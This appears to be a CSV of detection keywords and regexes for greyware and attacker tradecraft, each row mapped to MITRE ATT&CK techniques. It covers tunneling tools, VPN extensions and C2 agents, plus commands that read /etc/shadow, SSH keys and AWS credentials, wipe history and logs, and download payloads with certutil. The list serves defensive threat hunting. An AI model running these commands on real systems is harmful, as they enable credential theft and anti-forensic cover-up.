"*setcap cap_net_bind_service=+ep boringproxy*",".{0,1000}setcap\scap_net_bind_service\=\+ep\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*usermod -a -G boringproxy boringproxy*",".{0,1000}usermod\s\-a\s\-G\sboringproxy\sboringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","N/A","N/A","10","10","1190","112","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*omghfjlpggmjjaagoclmmobgdodcjboh*",".{0,1000}omghfjlpggmjjaagoclmmobgdodcjboh.{0,1000}","greyware_tool_keyword","Browsec VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*jdgilggpfmjpbodmhndmhojklgfdlhob*",".{0,1000}jdgilggpfmjpbodmhndmhojklgfdlhob.{0,1000}","greyware_tool_keyword","Browser VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*&browser=tor&api=false*",".{0,1000}\&browser\=tor\&api\=false.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*.srv.browser.lol*",".{0,1000}\.srv\.browser\.lol.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*browser.lol/create*",".{0,1000}browser\.lol\/create.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*https://browser.lol/vnc?server=*",".{0,1000}https\:\/\/browser\.lol\/vnc\?server\=.{0,1000}","greyware_tool_keyword","browser.lol","Virtual Browser - Safely visit blocked or risky websites - can be used to bypass network restrictions within a corporate environment","T1071 - T1090 - T1562","TA0005","N/A","N/A","Defense Evasion","https://browser.lol","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*http://127.0.0.1:8081*",".{0,1000}http\:\/\/127\.0\.0\.1\:8081.{0,1000}","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105  - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","99","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z"
"*https://*.btunnel.co.in*",".{0,1000}https\:\/\/.{0,1000}\.btunnel\.co\.in.{0,1000}","greyware_tool_keyword","btunnel.in","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://www.btunnel.in/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*chioafkonnhbpajpengbalkececleldf*",".{0,1000}chioafkonnhbpajpengbalkececleldf.{0,1000}","greyware_tool_keyword","BullVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","greyware_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#namedpipe","avast named pipe - subject to false positives","10","10","N/A","N/A","N/A","N/A"
"*http://canarytokens.com/*/*",".{0,1000}http\:\/\/canarytokens\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","canarytokens.com","free honeypot detection tokens but also abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://canarytokens.com","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
"*cat *.atftp_history*",".{0,1000}cat\s.{0,1000}\.atftp_history.{0,1000}","greyware_tool_keyword","cat","show atftp history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.atftp_history*",".{0,1000}cat\s.{0,1000}\.atftp_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","show bash history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.bash_history*",".{0,1000}cat\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*cat *.mysql_history*",".{0,1000}cat\s.{0,1000}\.mysql_history.{0,1000}","greyware_tool_keyword","cat","show mysql history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.mysql_history*",".{0,1000}cat\s.{0,1000}\.mysql_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*cat *.nano_history*",".{0,1000}cat\s.{0,1000}\.nano_history.{0,1000}","greyware_tool_keyword","cat","show nano history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.nano_history*",".{0,1000}cat\s.{0,1000}\.nano_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*cat *.php_history*",".{0,1000}cat\s.{0,1000}\.php_history.{0,1000}","greyware_tool_keyword","cat","show php history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.php_history*",".{0,1000}cat\s.{0,1000}\.php_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*cat *.zsh_history*",".{0,1000}cat\s.{0,1000}\.zsh_history.{0,1000}","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","2","9","N/A","N/A","N/A","N/A"
"*cat *.zsh_history*",".{0,1000}cat\s.{0,1000}\.zsh_history.{0,1000}","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat *bash-history*",".{0,1000}cat\s.{0,1000}bash\-history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /dev/null > $HISTFILE*",".{0,1000}cat\s\/dev\/null\s\>\s\$HISTFILE.{0,1000}","greyware_tool_keyword","cat","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*cat /dev/null > /var/log/*.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","cat","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*cat /dev/null > /var/log/auth.log*",".{0,1000}cat\s\/dev\/null\s\>\s\/var\/log\/auth\.log.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /dev/null > ~/.bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /etc/passwd*",".{0,1000}cat\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /etc/shadow*",".{0,1000}cat\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /etc/sudoers*",".{0,1000}cat\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","cat","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cat /root/.aws/credentials*",".{0,1000}cat\s\/root\/\.aws\/credentials.{0,1000}","greyware_tool_keyword","cat","cat suspicious commands","T1003 - T1552","TA0006 - TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*cat /root/.ssh/id_rsa*",".{0,1000}cat\s\/root\/\.ssh\/id_rsa.{0,1000}","greyware_tool_keyword","cat","cat suspicious commands","T1003 - T1552","TA0006 - TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://files.catbox.moe/*","https:\/\/files\.catbox\.moe\/[^\s\n]+","greyware_tool_keyword","catbox.moe","The cutest free file host you've ever seen - abused by threat actors","T1560.001 - T1190 - T1102 - T1027.002","TA0001 - TA0005 - TA0042","N/A","N/A","Collection","https://files[.]catbox.moe","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*certutil.exe -urlcache -split -f *https://cdn.discordapp.com/attachments/*",".{0,1000}certutil\.exe\s\-urlcache\s\-split\s\-f\s.{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/.{0,1000}","greyware_tool_keyword","certutil","LOLBAS execution - downloading payload from discord with certutil","T1105 - T1218.010 - T1071.001 - T1036.005","TA0009 - TA0002 - TA0005","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*chattr +i $HISTFILE*",".{0,1000}chattr\s\+i\s\$HISTFILE.{0,1000}","greyware_tool_keyword","chattr","lock out the ability to update the file","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*chattr +i *.bash_history*",".{0,1000}chattr\s\+i\s.{0,1000}\.bash_history.{0,1000}","greyware_tool_keyword","chattr","lock out the ability to update the file","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*chattr -ia */etc/passwd*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/passwd.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*chattr -ia */etc/shadow*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/shadow.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*chattr -ia */etc/sudoers*",".{0,1000}chattr\s\-ia\s.{0,1000}\/etc\/sudoers.{0,1000}","greyware_tool_keyword","chattr","changes the permissions and attributes of sensibles files","T1222.001 - T1222.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*cmd.exe /c chcp >&2*",".{0,1000}cmd\.exe\s\/c\schcp\s\>\&2.{0,1000}","greyware_tool_keyword","chcp","chcp displays the number of the active console code page","T1059 - T1027","TA0002 - TA0009","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*brave* --headless * --dump-dom http*",".{0,1000}brave.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}brave\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A"
"*chrome* --headless * --dump-dom http*",".{0,1000}chrome.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}chrome\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A"
"*msedge* --headless * --dump-dom http*",".{0,1000}msedge.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*msedge* --headless --disable-gpu --remote-debugging-port=*",".{0,1000}msedge.{0,1000}\s\-\-headless\s\-\-disable\-gpu\s\-\-remote\-debugging\-port\=.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment -  abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}msedge\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A"
"*opera* --headless * --dump-dom http*",".{0,1000}opera.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}opera\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A"
"*vivaldi* --headless * --dump-dom http*",".{0,1000}vivaldi.{0,1000}\s\-\-headless\s.{0,1000}\s\-\-dump\-dom\shttp.{0,1000}","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",".{0,1000}vivaldi\.exe.{0,1000}\s\-\-load\-extension\=\"".{0,1000}\\Users\\.{0,1000}\\Appdata\\Local\\Temp\\.{0,1000}","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","N/A","risk of false positives","7","10","N/A","N/A","N/A","N/A"
"*%SystemRoot%\\MEMORY.DMP*",".{0,1000}\%SystemRoot\%\\\\MEMORY\.DMP.{0,1000}","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","195","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
"*C:\Windows\MEMORY.DMP*",".{0,1000}C\:\\Windows\\MEMORY\.DMP.{0,1000}","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","195","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
"*pcienlhnoficegnepejpfiklggkioccm*",".{0,1000}pcienlhnoficegnepejpfiklggkioccm.{0,1000}","greyware_tool_keyword","Cloud VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*._tcp.argotunnel.com*",".{0,1000}\._tcp\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*.v2.argotunnel.com*",".{0,1000}\.v2\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*/cloudflared.git*",".{0,1000}\/cloudflared\.git.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*/cloudflared/tunnel/*",".{0,1000}\/cloudflared\/tunnel\/.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*/cloudflared-linux-*.deb*",".{0,1000}\/cloudflared\-linux\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*/cloudflared-linux-*.rpm*",".{0,1000}\/cloudflared\-linux\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*/usr/local/bin/cloudflared tunnel*",".{0,1000}\/usr\/local\/bin\/cloudflared\stunnel.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*\cloudflared.exe*",".{0,1000}\\cloudflared\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*\cloudflared\cmd\*",".{0,1000}\\cloudflared\\cmd\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*\cloudflared-2023.*",".{0,1000}\\cloudflared\-2023\..{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*\cloudflared-2024.*",".{0,1000}\\cloudflared\-2024\..{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
